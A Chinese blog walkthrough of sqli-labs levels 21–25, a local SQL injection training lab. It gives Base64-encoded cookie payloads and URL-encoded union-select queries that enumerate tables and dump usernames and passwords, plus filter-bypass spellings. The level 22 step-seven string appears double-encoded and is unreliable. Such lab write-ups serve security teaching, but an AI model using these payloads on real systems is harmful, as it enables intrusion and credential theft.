首页 > 数据库 >sqli-labs靶场通关攻略 21-25

sqli-labs靶场通关攻略 21-25

时间:2024-08-22 19:52:19浏览次数:11  
标签:27% 25 201 21 less 步骤 labs id schema

主页有sqli-labs靶场通关攻略 1-20

第二一关 less-21

步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包

步骤二:在Cookie后输入'报错,判断闭合方式为') #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

步骤三:判断列数

') order by 4 #  =>  Jykgb3JkZXIgYnkgNCAj

') order by 3 #  =>  Jykgb3JkZXIgYnkgMyAj

列数为三

步骤四:查询回显点

') union select 1,2,3 #   =>  JykgdW5pb24gc2VsZWN0IDEsMiwzICM=

步骤五:查询数据库

') union select 1,2,database() #  =>  JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=

步骤六:查表名

代码:') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 

转换码:JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=

步骤七:查列名

代码:') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

转换码:

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj

步骤八:查询表中所有数据

代码:') union select 1,2,group_concat(id,username,password) from users #

转换码:JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==

第二二关 less-22

步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包

步骤二:在Cookie后输入'报错,判断闭合方式为" #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

步骤三:判断列数

" order by 4 #  =>  IiBvcmRlciBieSA0ICM=

" order by 3 #  =>  IiBvcmRlciBieSAzICM=

列数为三

步骤四:查询回显点

" union select 1,2,3 #   =>  IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==

步骤五:查询数据库

" union select 1,2,database() #  =>  IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==

步骤六:查表名

代码:" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 

转换码:IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==

步骤七:查列名

代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

转换码:

SWlCMWJtbHZiaUJ6Wld4bFkzUWdNU3huY205MWNGOWpiMjVqWVhRb1kyOXNkVzF1WDI1aGJXVXBMRE1nWm5KdmJTQnBibVp2Y20xaGRHbHZibDl6WTJobGJXRXVZMjlzZFcxdWN5QjNhR1Z5WlNCMFlXSnNaVjl6WTJobGJXRTlKM05sWTNWeWFYUjVKeUJoYm1RZ2RHRmliR1ZmYm1GdFpUMG5kWE5sY25NbklDTT0=

步骤八:查询表中所有数据

代码:" union select 1,2,group_concat(id,username,password) from users #

转换码:IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj

第二三关 less-23

步骤一:用?id=1 --+有数据

                用?id=1 #有数据

发现--+和#过滤

步骤二:判断闭合方式:?id=1' and ' 1 ' =' 1

步骤三:查询回显参数

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201

步骤四:查询数据库

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,database(),3%20and%20%27%201%20%27%20=%27%201

步骤五:查表名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%27%201%20%27%20=%27%201

步骤六:查列名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20%27%201%20%27%20=%27%201

第二四关 less-24

步骤一:注册新用户

步骤二:登录->修改密码

修改成功

第二五关 less-25

步骤一:or 和and 被过滤

利用联合查询闭合方式为id=1' --+

步骤二:查回显参数

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+

步骤三:查询数据库

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+

步骤四:查表名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27%20--+

步骤五:查列名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27%20--+

步骤六:查所有数据

http://127.0.0.1/less-25/?id=-1%27union%20select%201,group_concat(username,0x3a,passwoorrd),3%20from%20users%20--+

标签:27%,25,201,21,less,步骤,labs,id,schema
From: https://blog.csdn.net/2301_82061181/article/details/141424417

相关文章

  • sqli-labs靶场通关攻略 16-20
    主页有sqli-labs靶场通关攻略1-15第十六关less-16​步骤一:判断闭合方式为admin") and1=1#​步骤二:判断列数admin")orderby2 #数据正常admin")orderby3#数据报错得出结果2列​​步骤三:判断数据库长度1")orlength(database())=8#​说明数据裤字符......
  • ASP: Response 对象 错误 'ASP 0251 : 80004005' 解决办法
    ASP:Response对象错误'ASP0251:80004005'解决办法 Response对象错误'ASP0251:80004005'超过响应缓冲区限制 这种情况一般是因为需要输出的网页内容太大了,由于asp在输入内容到客户的浏览器上之前,会把需要输出的全部内容先输出到缓存区,这个缓存区一般默认大小......
  • 基于SpringBoot+Vue的学生作业管理系统的详细设计和实现(25年最新,附源码+论文+部署讲
    文章目录1.前言2.系统演示录像3.论文参考4.代码运行展示图5.技术框架5.1SpringBoot技术介绍5.2Vue技术介绍6.可行性分析7.系统测试7.1系统测试的目的7.2系统功能测试8.数据库表设计9.代码参考10.数据库脚本11.找我做程序,有什么保障?12.联系我们1.前......
  • 题解:P9041 [PA2021] Fiolki 2
    \(\text{Link}\)题意给定一个\(n\)个点\(m\)条边的DAG,定义\(f(l,r)\)表示最多选取多少条不相交路径\((s_i,t_i)\)满足\(s_i\in[1,k],t_i\in[l,r]\),其中不能有任意一点同时在两条选出的路径上。对\(\forallx\in[0,k)\)求出有多少\([l,r]\sube(k,n]\)使得\(f(l,r)......
  • 呼死你 手机轰炸机 (29021243
    基于短信轰炸机原理研究并实现之后又研究起了电话轰炸机实现原理其实大同小异,最终的区别的用户在进行短信发送并未收到短信的情况下【产生的原因有网络信号原因、用户手机自动屏蔽原因】可以利用第三方平台提供的语音验证码进行发送这种情况也是通过fiddler进行抓包处理......
  • 2024年关于短信轰炸机原理研究并实现的流程 (290021243
    偶然看到gitHub上面有短信轰炸机源码,于是产生了研究的想法。经过研究源码发现是通过抓包进行第三方网站抓包并且收集,最终进行post/get请求。携带header和token进行第三方网站模拟请求。于是在mac上面下载了fiddler进行代理配置开放了本机ip下的8888商品,用手机同时访问本机ip的......
  • 【2025考研英语高分写作:20大必备范文】经典范文053 社会热点:健康 P177
    Directions:Writeanessaybasedonthefollowingchart.Inyourwriting,youshould1)interpretthechart,and2)giveyourcomments.Youshouldwriteabout150wordsontheANSWERSHEET.        Thelinechartaboveillustratesclearlytheamoun......
  • 海光 FTPM 运行报错:Fapi_Provision_Finish() ErrorCode (0x00060025) No EK certifica
    使用的是海光CPU提供的基于固件的FTPM,错误原因是海光没有给TPM提供相应的EK证书。从而导致Fapi_Provision()接口无法通过证书的校验。关于Fapi_Provision()接口的功能,官网提到是:RetrievetheEKtemplate,nonceandcertificate,verifythattheymatchtheTPM’sEK......
  • 洛谷 P2590 [ZJOI2008] 树的统计 题解
    题目大意给你一个\(N\),然后再给你两个长度为\(N\)的序列。让你构造一个仅有\(0\)和\(1\)的\(N\timesN\)的正方形,但是要满足两个序列的顺序:第一个序列指的是该正方形每一行所构成的二进制数的大小顺序。第二个序列指的是该正方形每一列所构成的二进制数的大小顺序。......
  • 【2024-08-21】万万不能
    20:00以后的事以后再讲。万一以后不开心怎么办,还不如先做好现在的开心。                                                 ——全红婵成家立业以后,包括我自己也经常自......